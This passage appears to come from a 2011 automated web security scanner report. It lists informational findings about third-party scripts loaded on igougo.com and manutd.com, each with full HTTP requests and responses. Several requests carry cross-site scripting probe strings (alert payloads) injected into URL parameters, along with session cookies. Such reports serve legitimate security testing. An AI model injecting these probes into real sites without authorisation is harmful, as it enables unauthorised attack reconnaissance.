<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?" type="text/javascript"></script>
...[SNIP]...
20.69. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="7q9zFOyFqTPnc5W06UryrpkD0++Wka0AMjC1S1xA6P1yyTp8PCxurvnrk9jOzADXv65HGKV1PAMbdsNjVp0aWbrCQsVMDW+7SSf9eWpiDrdh5lUG1nQvUBpOJY8=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?" type="text/javascript"></script>
...[SNIP]...
20.70. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1; mbox=check#true#1317601683|session#1317601622475-177474#1317603483|PC#1317601622475-177474.19#1318811230; __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; SL_UVId=2BC47C1462303C7A

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="3N4s99OteDpCXgpNG2PjNUab70AmGz5GNt8h7GVhdJlW5f7uORj9diLS188nzy3C95evwfUCPht+S0+LL/XseWCdGKfWD3MqIININNQGXpT1AOgH8SdbDoTSVkI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?" type="text/javascript"></script>
...[SNIP]...
20.71. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:02:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="NVxZLHrIqCswN0wRDdLbAP4q6i7JUBF/BSBKXwsRucQjl8JZXW8fooMbdWdfUcptWjfwNfh3+gW3yrXemG3k7WR8V+VhyM0fcttuCxI346cfwmMHvuUlHs6/8Fc=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?" type="text/javascript"></script>
...[SNIP]...
20.72. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-4; mbox=session#1317601622475-177474#1317604984|PC#1317601622475-177474.19#1318812724|check#true#1317603184; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36801


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="5ZNp3byNbF4rEWpnV3Mgyig3ck+AM/H1JHJZ7rg546Nro6tmpBO79IXKcqIJ4C7B68/bNMrfxkMrNXTYUJtk3H/IsKviVwR5Iwpi2TYMU6oH4U3USehc0e6zulY=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?" type="text/javascript"></script>
...[SNIP]...
20.73. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:54:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="htUBgDWgvvvhpb2xHSKIzmWayFVjHUNiN+bbTswgTjdNej6MQx2CBFHihW9CB61llOgCDzIRoiGaakK7axh51mklWwWfScOWQx9a7tggZDZI6snXPCpFOlzwKII=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?" type="text/javascript"></script>
...[SNIP]...
20.74. http://www.igougo.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /about/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/ HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-5; mbox=PC#1317601622475-177474.19#1318816337|check#true#1317606797|session#1317606736569-208906#1317608597

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47F12FA5D4186;path=/;
X-SL-CompState: Uncompiled
X-Strangeloop: ViewState,Compression
Content-Length: 40510


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   

<meta http-equiv="X-UA-Compatible" content="IE=Emulate
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="000006THQNWM5" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471?" type="text/javascript"></script>
...[SNIP]...
<div class="squareAd alignC">
           <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471?" type="text/javascript"></script>
...[SNIP]...
20.75. http://www.igougo.com/traveldeals/ratefinder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:27:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1671993858634531840221815835&adsize=728x90&pagepos=1&random=634531840221659588?" type="text/javascript"></script>
...[SNIP]...
<header>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
20.76. http://www.igougo.com/xd_receiver.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /xd_receiver.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver.aspx HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=5aaf37e32a30d8d582e69f8ddbfea86b&extern=0&channel=http%3A%2F%2Fwww.igougo.com%2Fxd_receiver.aspx&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-5; mbox=PC#1317601622475-177474.19#1318816337|check#true#1317606797|session#1317606736569-208906#1317608597; SL_UVId=2BC47F12FA5D4186; __utma=179047228.1875149061.1317601642.1317603064.1317606790.2; __utmb=179047228.1.10.1317606790; __utmc=179047228; __utmz=179047228.1317606790.2.2.utmcsr=igougo.com|utmccn=(referral)|utmcmd=referral|utmcct=/traveldeals/ratefinder.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 01:53:26 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Strangeloop: ViewState,Compression
Content-Length: 374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><body><script type="text/javascript
...[SNIP]...
</script><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...
20.77. http://www.manutd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 26620
Cache-Control: public, max-age=153
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="/styles/css/english.css?v=87" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script>
...[SNIP]...
20.78. http://www.manutd.com/One-United/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
